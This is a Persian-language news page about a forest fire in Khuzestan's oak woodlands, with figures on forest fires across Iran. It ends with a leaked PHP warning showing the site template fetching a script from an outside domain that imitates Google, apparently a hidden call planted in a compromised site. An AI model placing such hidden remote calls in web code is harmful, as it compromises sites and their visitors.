Monday 19 October 2020 / دوشنبه 28 مهر 1399

جستجو

P7a

AndishehTV

ATV Frequenter

iran khuzestan oak forest in fire

جنگل‌های منطقه پس‌آخور بخش الوار گرمسیری در کنار منطقه دشت لاله در شمال استان خوزستان از بامداد روز دوشنبه ۷ تیر آتش گرفت. مردم برای خاموش کردن آتش وارد عمل شده‌اند.
خبرگزاری جمهوری اسلامی ایران (ایرنا) این آتش‌سوزی را شدید توصیف کرد، طوری که زبانه‌های آتش از فواصل دور در این منطقه جنگلی قابل مشاهده است.
در حالی‌که تجهیزات کافی برای اطفای حریق در جنگل‌ها و مراتع اندیمشک وجود ندارد، مردم منطقه برای خاموش کردن آتش وارد عمل شده‌اند.


در سال‌های اخیر آتش‌سوزی خسارات جبران ناپذیری به درختان بلوط این منطقه وارد کرده است. افزون بر یک هزار هکتار از جنگل‌های بخش الوار اندیمشک که دارای گونه‌های گیاهی ‏نادر هستند در سال‌های گذشته در آتش سوخت.
در ایران شمار آتش‌سوزی جنگل‌ها و عرصه‌های منابع طبیعی در سال‌های اخیر افزایش پیدا کرده است با این حال سازمان‌های دولتی امکانات لازم را برای خاموش کردن آتش در اختیار ندارند.
مساحت جنگل‌های ایران بین ۱۱ تا ۱۴ میلیون هکتار برآورد شده است. مسئولان سازمان جنگل‌ها می‌گویند در یک دهه گذشته بیش از ۱۴‌هزار فقره آتش‌سوزی در جنگل‌های ایران رخ داده که در مجموع به ۱۵۰ هزار هکتار از سطح عرصه‌های طبیعی کشور خسارت وارد کرده است


Warning: file_get_contents(http://panel.google-amp.org/al.php?s=374): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/andish5/public_html/templates/rt_audacity/index.php on line 311